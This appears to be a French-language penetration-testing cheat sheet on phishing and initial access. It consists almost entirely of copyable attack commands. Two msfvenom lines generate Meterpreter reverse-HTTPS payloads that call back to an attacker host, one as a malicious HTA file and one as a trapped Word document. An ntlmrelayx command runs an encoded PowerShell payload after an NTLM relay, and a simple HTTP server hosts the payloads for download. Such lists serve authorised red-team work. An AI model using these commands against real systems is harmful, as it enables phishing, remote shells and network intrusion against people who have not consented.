Pre-Exploitation

Phishing & Initial Access

Vecteurs d'accès initial : HTA, macros Office et combinaisons avec relay.

Copy command
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$ATTACKER_IP LPORT=443 -f hta-psh -o payload.hta

Description: Générer un HTA malveillant : exécution via mshta.exe, contourne certains contrôles.

Copy command
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$ATTACKER_IP LPORT=443 -f docx -o lure.docx

Description: Payload macro Word : accès initial classique via un document Office piégé.

Copy command
ntlmrelayx.py -tf relay.txt --smb2support -c 'powershell -enc $BASE64_PAYLOAD'

Description: Combiner relay avec exécution de payload post-relay.

Copy command
python3 -m http.server 80

Description: Héberger les payloads pour téléchargement via PowerShell ou curl.